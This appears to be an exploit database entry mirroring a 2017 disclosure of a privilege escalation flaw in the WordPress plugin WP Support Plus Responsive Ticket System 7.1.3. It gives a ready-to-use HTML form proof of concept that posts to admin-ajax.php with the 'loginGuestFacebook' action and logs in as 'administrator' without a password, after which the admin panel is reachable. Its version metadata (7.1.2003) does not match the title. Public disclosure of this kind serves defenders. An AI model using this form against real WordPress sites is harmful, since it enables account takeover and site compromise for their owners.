header-logo
Suggest Exploit
vendor:
WP Support Plus Responsive Ticket System
by:
Kacper Szurek
N/A
CVSS
N/A
Privilege Escalation
Unknown
CWE
Product Name: WP Support Plus Responsive Ticket System
Affected Version From: 7.1.2003
Affected Version To: 7.1.2003
Patch Exists: Unknown
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2017

WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
 
1. Description

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html

2. Proof of Concept

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to admin panel.